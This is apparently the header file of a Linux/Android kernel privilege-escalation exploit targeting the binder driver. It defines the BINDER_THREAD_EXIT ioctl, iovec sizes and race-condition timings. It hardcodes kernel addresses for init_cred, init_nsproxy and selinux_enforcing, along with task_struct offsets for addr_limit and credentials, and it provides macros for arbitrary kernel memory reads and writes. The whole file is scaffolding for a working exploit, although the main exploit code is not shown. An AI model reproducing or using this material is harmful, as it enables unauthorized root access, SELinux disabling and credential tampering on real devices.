exploit.h

#pragma once

#ifndef __EXPLOIT_H__
#define __EXPLOIT_H__

#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/////////////
// HELPERS //
/////////////
int tabs = 0;
static inline void indent(FILE* file)
{
    for (int i = 0; i < tabs; i++)
        fprintf(file, "\t");
}

//////////////////////
// CONSTANT DEFINES //
//////////////////////
#define nullptr (void*)0

#define DEADBEEF            0xdeadbeeful
#define BINDER_THREAD_EXIT  0x40046208ul
#define IOVEC_SIZE          0x10000
#define IOVECS_LEN          25

#define MAX_TRIALS          4
#define RETRY_WAIT          3
#define SUCCESS_WAIT        1
#define RACE_CONDITION_WAIT 2

#define KNRM                "\x1B[0m"
#define KRED                "\x1B[31m"
#define KGRN                "\x1B[32m"
#define KYEL                "\x1B[33m"
#define KBLU                "\x1B[34m"
#define KMAG                "\x1B[35m"
#define KCYN                "\x1B[36m"
#define KWHT                "\x1B[37m"

// System.map
// ffffffff80200000 T _stext
// ffffffff81433ac0 D init_nsproxy
// ffffffff816acfe8 B selinux_enforcing
// ffffffff81433c30 D init_cred

#define KERNEL_BASE         0xffffffff80200000ul
#define INIT_NSPROXY        0xffffffff81433ac0ul
#define SELINUX_ENFORCING   0xffffffff816acfe8ul
#define INIT_CRED           0xffffffff81433c30ul

#define KERNEL_OFFSET(name) (name - KERNEL_BASE)

// Variable offsets
// macro define offsetof(_type, _memb) ((long)(&((_type *)0)->_memb))
#define ADDR_LIMIT_OFFSET   0xa18ul // p /x (long)offsetof(struct task_struct, thread) + (long)offsetof(struct thread_struct, addr_limit)
#define PID_OFFSET          0x4e8ul // p /x offsetof(struct task_struct, pid)
#define NSPROXY_OFFSET      0x6c0ul // p /x offsetof(struct task_struct, nsproxy)
#define REAL_CRED_OFFSET    0x680ul // p /x offsetof(struct task_struct, real_cred)

//////////////////////
// FUNCTION DEFINES //
//////////////////////
#define SUCCESS(...) { \
    indent(stdout); \
    printf("%s[*]%s ", KGRN, KNRM); \
    printf(__VA_ARGS__); \
    printf("\n"); \
    fflush(stdout); \
}
#define INFO(...) { \
    indent(stdout); \
    printf("%s[+]%s ", KYEL, KNRM); \
    printf(__VA_ARGS__); \
    printf("\n"); \
    fflush(stdout); \
}
#define NORET_ERR(...) { \
    indent(stderr); \
    fprintf(stderr, "%s[!]%s ", KRED, KNRM); \
    fprintf(stderr, __VA_ARGS__); \
    fflush(stderr); \
}
#define ERR_CHILD(...) { \
    NORET_ERR(__VA_ARGS__); \
    fprintf(stderr, ": 0x%x\n", errno); \
    fflush(stderr); \
    exit(errno); \
}
#define ERR(...) { \
    NORET_ERR(__VA_ARGS__); \
    fprintf(stderr, ": 0x%x\n", errno); \
    fflush(stderr); \
    return false; \
}

#define READ_FROM_KERNEL(var, addr) kernelCopy(addr, &var, sizeof(var))
#define WRITE_TO_KERNEL(var, addr) kernelCopy(&var, addr, sizeof(var))

#endif //__EXPLOIT_H__